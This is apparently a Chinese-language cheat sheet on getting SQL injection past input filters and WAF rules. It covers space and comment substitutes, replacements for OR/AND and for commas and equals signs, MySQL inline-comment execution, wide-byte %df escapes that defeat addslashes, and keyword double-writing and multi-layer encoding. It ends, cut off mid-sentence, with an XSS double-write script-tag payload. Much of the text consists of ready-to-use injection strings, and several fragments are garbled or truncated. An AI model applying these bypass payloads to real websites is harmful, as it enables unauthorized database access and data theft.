目录
1.绕过 特定过滤
1.绕过空格过滤
2.绕过or,and等等过滤
3.绕过注释符过滤
4.绕过字段过滤
5. 单引号绕过
6. 逗号绕过
7. 等号与运算符绕过
2.绕过 过滤方法
1. 大小写统一过滤绕过
2. 递归替换规则绕过
3. 正则贪婪匹配绕过
4. 编码与语法变形绕过
5. 分隔符与函数绕过
常用绕过方法
方法
场景
1.绕过 特定过滤
1.绕过空格过滤
1.使用下面的URL编码替代:
%20(标准空格)、%09(Tab)、%0a(换行符)、%0d(回车符)、%a0(不可见空格)%0b、%0c(垂直Tab/换页符)
2.符号与语法替代
括号 ():包裹字段或子查询,无需空格
反引号 `:MySQL中用于字段名包裹,可替代空格
加号 +:在特定数据库(如SQL Server)中替代空格
3.双空格与重复符号
双空格:部分过滤规则仅替换单空格,双空格可绕过
双斜杠 //:非标准方法,部分场景可解析为空格
4.注释符替代
MySQL内联注释
/*!版本号\*/
标准注释符
/**‌==/
union/==‌/select/‌==/1,2,3
/**/ 直接替代空格,保持语句连贯性。
当 /**/ 被过滤时,可混合使用其他注释符。
/*!00000假注释*/ 表示版本号0.0.0(始终不执行),注释内容被忽略
组合使用:混合注释符与特殊字符(如 %0a、())提高绕过成功率。
2.绕过or,and等等过滤
1.符号替代法
原理:利用数据库支持的逻辑符号替代关键词。
|| 替代 OR(需数据库开启 PIPES_AS_CONCAT模式):
&& 替代 AND(MySQL默认支持):
^ 替代 XOR(位异或操作符,需结合条件判断):
! 或 <> 替代 NOT
适用场景:
数据库允许符号逻辑运算(如MySQL默认支持 &&、||)。
过滤规则未拦截符号(如 ||、^)。
2. 大小写混合
原理:绕过简单的大小写敏感过滤
适用场景:过滤规则未统一转为小写
3.双写关键词
原理:绕过单次关键词替换。
适用场景:仅替换一次关键词。
4.注释符分割关键词
原理:在关键词中插入注释符,绕过字符串匹配。
sqlCopy CodeSELECT * FROM users WHERE id=1 O/**/R 1=1;
SELECT * FROM users WHERE id=1 AN/*!50000D*/ username='admin';
适用场景:过滤规则未递归删除注释符。
4. 函数与数学运算替代
原理:利用函数或数学运算构造逻辑条件。
替代 XOR
sqlCopy Code-- 使用减法模拟异或(仅限0/1逻辑)
SELECT * FROM users WHERE (id=1) - (username='admin') = 1;
替代 NOT
SELECT * FROM users WHERE IF(username='admin', 0, 1); -- NOT(username='admin')
替代 AND/OR
使用乘法模拟 AND(条件全为真时结果为1)
SELECT * FROM users WHERE (id=1) * (username='admin');
使用加法模拟 OR(任一条件为真时结果>=1)
SELECT * FROM users WHERE (id=1) + (username='admin');
适用场景:需要构造复杂逻辑条件时(如盲注)。
5.编码与空白符混淆
原理:对关键词进行编码或插入不可见字符。
URL编码
O%52%20 → OR (需数据库自动解码)
十六进制编码
SELECT * FROM users WHERE 0x4F52 1=1; -- 0x4F52 为 "OR" 的十六进制
插入换行符/Tab
SELECT * FROM users WHERE id=1%0aAnD%091=1;
6.联合查询
在后面为查询语句时,如果and被过滤可以用union联合查询
3.绕过注释符过滤
场景:注释符(--、#、/**/)被过滤时,需重构注入逻辑。 方法:闭合引号+逻辑运算符:' or 1='1 替代注释符闭合
4.绕过字段过滤
1.大小写混合
原理:绕过简单的大小写敏感过滤
适用场景:过滤规则未统一转为小写
2.双写关键词
原理:绕过单次关键词替换。
适用场景:仅替换一次关键词。
3.混合大小写+双写绕过复合过滤
适用场景:需同时绕过关键词删除和大小写敏感过滤。
4.内联注释执行代码
场景:绕过对特定关键词(如 UNION、SELECT)的过滤,强制数据库执行内联注释中的语句。 案例:
sqlCopy Codeid=1 /*!UNION*/ /*!SELECT*/ 1,2,3; -- MySQL执行内联注释中的代码
id=1 /*!50000UNION SELECT*/ 1,2,3; -- 指定版本号(仅MySQL 5.0.0+执行)
原理:MySQL支持内联注释中的语法执行,其他数据库忽略38。
5.注释符干扰过滤规则
场景:将敏感关键词拆分到注释符两侧,绕过正则匹配16。 案例:
SEL/*中间干扰*/ECT * FROM users; -- 拆分SELECT为 SEL/*...*/ECT
UNI/==‌**/ON SEL/**‌==/ECT 1,2,3; -- 分散关键词躲避过滤
原理:过滤规则未递归处理注释符时,注释符可隐藏关键词
6.反引号包裹
selectusernamefromusers(干扰关键词匹配)
5. 单引号绕过
场景:当单引号(')被过滤时,需闭合引号或避免直接使用。
方法:
宽字节注入:
字符集差异:宽字节编码(如GBK、GB2312)使用双字节表示一个字符,而单字节编码(如ASCII)仅用单字节。当程序未正确处理字符集转换时,攻击者可通过构造%df%5c(%5c为反斜杠\)等组合,使系统误判为一个完整字符,从而绕过转义机制。转义逻辑绕过:若程序使用addslashes或魔术引号对单引号转义(如'→\'),攻击者可输入%df',触发字符集转换后变为%df%5c%27,导致反斜杠被“吞并”,单引号逃逸并引发SQL注入。
注释符闭合:用 --+ 或 # 截断后续语句(如 id=1' --+)。
十六进制编码:将字符串转为十六进制(如 'admin' → 0x61646D696E)。
6. 逗号绕过
场景:逗号(,)被过滤时,需重构语法。
方法:
JOIN语句:JOIN用于关联多个表中的数据,用 join 替代逗号(如 union select * from (select 1)a join (select 2)b)。
FROM FOR语法:一种替代语法,substr(str from 1 for 1) 替代 substr(str,1,1)。
LIMIT OFFSET:跳过x行,取y行,limit y offset x 替代从第 x 行开始,返回 y 行 limit x,y。
7. 等号与运算符绕过
场景:=、<、> 被过滤时,需使用替代逻辑。
方法:
LIKE子句:where username like 'a%' 替代 = 'a'。
BETWEEN:id between 1 and 3 替代 id >=1 and id <=。
位运算:1 ^ (ascii(substr(user(),1,1)) > 97)(盲注时替代比较符)
2.绕过 过滤方法
1. 大小写统一过滤绕过
特殊字符插入法:在关键词中插入非字母字符(如数字、符号),例如 SEL%311ECT(%31为十六进制“1”),干扰小写转换逻辑。
全角字符混淆:使用全角字母(如 SELECT)绕过小写转换,依赖数据库对Unicode字符的兼容性。
2. 递归替换规则绕过
双写嵌套绕过:若递归次数有限(如仅替换2次),构造 UNIunionunionON → 替换后变为 UNION。
动态生成关键词:利用过滤规则生成目标字段(如输入 UNI<过滤后生成ON> → 组合为 UNION),需探测递归逻辑。
3. 正则贪婪匹配绕过
注释符分割:在关键词中插入注释符(如 SEL/!/ECT),破坏正则的连续匹配逻辑。
换行符干扰:使用 %0a或 %0d分割字段(如 SEL%0aECT),绕过单行匹配规则。
4. 编码与语法变形绕过
多层编码混淆:组合URL编码、十六进制和Unicode编码(如 %55%4E%49%4F%4E → UNION),测试过滤层的解码顺序。
隐式语法替代:使用 BETWEEN 1 AND 3替代 >= 和 <=。
5. 分隔符与函数绕过
场景:逗号(,)被过滤时,需重构语法。
JOIN语句:用 join 替代逗号(如 union select * from (select 1)a join (select 2)b)。
FROM FOR语法:substr(str from 1 for 1) 替代 substr(str,1,1)。
LIMIT OFFSET:limit 1 offset 1 替代 limit 1,1。
函数变形:用 MID(username ,1 , 1)替代 SUBSTR(username,1,1)`。
常用绕过方法
方法
双写与大小写
场景
1. XSS攻击场景
案例1:双写绕过标签过滤
攻击方式
<sc<script>ript>alert(1)</script>
绕过原理:过滤规则删除
